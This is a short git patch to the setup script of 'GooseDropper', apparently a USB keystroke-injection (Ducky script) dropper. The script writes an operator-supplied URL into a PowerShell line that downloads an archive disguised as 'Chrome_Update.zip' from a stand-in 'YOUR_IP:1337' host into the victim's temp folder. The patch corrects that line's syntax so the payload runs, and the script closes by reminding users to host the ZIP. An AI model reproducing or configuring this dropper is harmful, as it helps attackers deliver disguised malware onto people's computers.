From 59f3b7822265d117e0e39775b00397ec210b9941 Mon Sep 17 00:00:00 2001 From: Malachi <79277183+Fr3ki@users.noreply.github.com> Date: Tue, 31 Oct 2023 16:49:21 -0600 Subject: [PATCH] Fix syntax --- Duckyscripts/GooseDropper/linux_setup.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Duckyscripts/GooseDropper/linux_setup.sh b/Duckyscripts/GooseDropper/linux_setup.sh index 62b7c7e..36263ef 100644 --- a/Duckyscripts/GooseDropper/linux_setup.sh +++ b/Duckyscripts/GooseDropper/linux_setup.sh @@ -23,7 +23,7 @@ then read -p "Enter your URL: " SRC SRC="$(echo "$SRC" | sed 's/\//\\\//g')" #Add your URL to the payload - sed -i "s/powershell wget YOUR_IP:1337\/Chrome_Update.zip -OutFile \$ENV:Temp\/Update.zip/powershell \"wget \'${SRC}\' -OutFile \$ENV:Temp\/Updater.zip\"/" GooseDropper.txt + sed -i "s/powershell wget YOUR_IP:1337\/Chrome_Update.zip -OutFile \$ENV:Temp\/Update.zip/powershell \"wget \'${SRC}\' -OutFile \$ENV:Temp\/Update.zip\"/" GooseDropper.txt #Remind users to have the zip ready echo "Please ensure a ZIP file with proper contents and formatting is hosted at the provided URL"